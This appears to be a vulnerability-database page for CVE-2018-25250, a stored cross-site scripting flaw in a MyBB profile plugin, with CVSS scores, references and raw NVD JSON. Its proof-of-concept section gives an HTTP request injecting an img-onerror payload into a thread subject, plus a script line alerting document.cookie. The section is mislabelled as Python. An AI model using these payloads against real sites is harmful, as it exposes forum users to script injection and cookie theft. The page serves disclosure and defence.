CVE-2018-25250

Description

MyBB Last User's Threads in Profile Plugin 1.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by crafting thread subjects with script tags. Attackers can create threads with script payloads in the subject field that execute when users visit the attacker's profile page.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mybb:last_user_threads:*:*:*:*:*:mybb:*:* - VULNERABLE

MyBB Last User's Threads in Profile Plugin 1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2018-25250 - Stored XSS in MyBB Plugin
Step 1: Attacker creates a new thread with the subject containing the payload.
-->
POST /newthread.php HTTP/1.1
Host: target-mybb-site.com
Content-Type: application/x-www-form-urlencoded

subject=<img src=x onerror=alert('CVE-2018-25250')>&message=test_content&fid=2

<!--
Step 2: Victim visits the attacker's profile page.
URL: /member.php?action=profile&uid=[ATTACKER_UID]

Step 3: The JavaScript alert will execute in the victim's browser.
-->
<script>
// Example payload to be injected in the thread subject field
var payload = '<script>alert(document.cookie)<\/script>';
console.log('Injecting payload: ' + payload);
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25250
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25250
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25250/
[4] VulDB https://vuldb.com/cve/CVE-2018-25250
[5] https://community.mybb.com/mods.php?action=view&pid=910
[6] https://www.exploit-db.com/exploits/44339
[7] https://www.vulncheck.com/advisories/mybb-last-user-s-threads-in-profile-plugin-persistent-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25250", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:21.033", "lastModified": "2026-04-20T14:31:19.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyBB Last User's Threads in Profile Plugin 1.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by crafting thread subjects with script tags. Attackers can create threads with script payloads in the subject field that execute when users visit the attacker's profile page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mybb:last_user_threads:*:*:*:*:*:mybb:*:*", "versionEndIncluding": "1.2", "matchCriteriaId": "CC9E2673-C62D-42E1-A807-70520B2EB458"}]}]}], "references": [{"url": "https://community.mybb.com/mods.php?action=view&pid=910", "source": "[email protected]", "tags": ["Permissions Required", "Product"]}, {"url": "https://www.exploit-db.com/exploits/44339", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/mybb-last-user-s-threads-in-profile-plugin-persistent-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}